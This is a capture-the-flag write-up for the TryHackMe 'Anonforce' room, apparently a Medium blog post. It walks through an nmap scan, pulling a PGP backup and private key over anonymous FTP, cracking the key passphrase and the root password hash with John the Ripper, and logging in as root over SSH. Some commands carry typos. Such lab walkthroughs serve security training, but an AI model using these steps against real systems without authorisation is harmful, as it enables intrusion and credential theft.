Open in app

Sign in

Write

Sign in

Anonforce : Try hack me

GrimTheRipper
4 min readFeb 16, 2025

--

“Anonforce” on TryHackMe is one of the rooms or challenges designed to practice cybersecurity skills, specifically focused on targeted attacks and penetration testing. This challenge typically involves tasks such as:

  1. Web Application Exploration: Using vulnerability scanning tools to identify exploitable information.
  2. Brute Force Attacks: Participants may be required to crack user or admin passwords.
  3. Identifying Common Vulnerabilities: Exploiting weaknesses caused by insecure configurations or outdated protocols such as FTP or HTTP.

In summary, “Anonforce” emphasizes practicing various attack techniques, such as password cracking or exploiting system vulnerabilities.

//

Let’s start together

//

First, start with nmap for scanning opening ports

nmap -sV -sC {traget}

There are 2 services running: FTP and SSH. let login ftp as Anonymous

ftp {traget}

list for find some intereting

ls

try to enter to home maybe have some thing

cd home

ls

you will see melodias try to going

cd melodias

ls

you see that user.txt

if you command try to read you can not, use command “get” for download before

get user.txt

exit

ls
cat user.txt

ftp again to find something more

ftp {traget}

ls

and you see notread

try to enter

cd not read

ls

lucky!! you found backup.pgp and private.asc

download it out

get backup.pgp

get private.asc

exit

ls

We need to crack the passphrase in order to import it into the keyring. We can use John the Ripper password-cracking tool for this. For we need to convert the private key file into a hash

gpg2john private.asc > privatehash.txt

Then, use john to crack the password

john privatejohn

Now I’ve got the password. Let’s import the private key and use the passphrase to decrypt.

gpg — import private.asc

Enter the password

The command gpg — decrypt backup.pgp is used to decrypt a file that has been encrypted with GPG, in this case, the file backup.psp . GPG will use the private key that corresponds to the public key used to encrypt the file

gpg — decrypt backup.pgp

copy root encrypt and make a file hash.txt

echo ‘root::’ > hash.txt

after that decrypt by john used to perform a brute force attack with the tool John the Ripper to crack hashed passwords found in the file hash.txt using a wordlist for guessing possible passwords.

john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt

the last solution you got password’s root next try to ssh user root with password that you got

ssh root{traget}

ls

cat root.txt

AH Haaaa!! you got flag

--

--

GrimTheRipper
GrimTheRipper

Written by GrimTheRipper

25 Followers
7 Following

You get the best out of others when you give the best of yourself

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech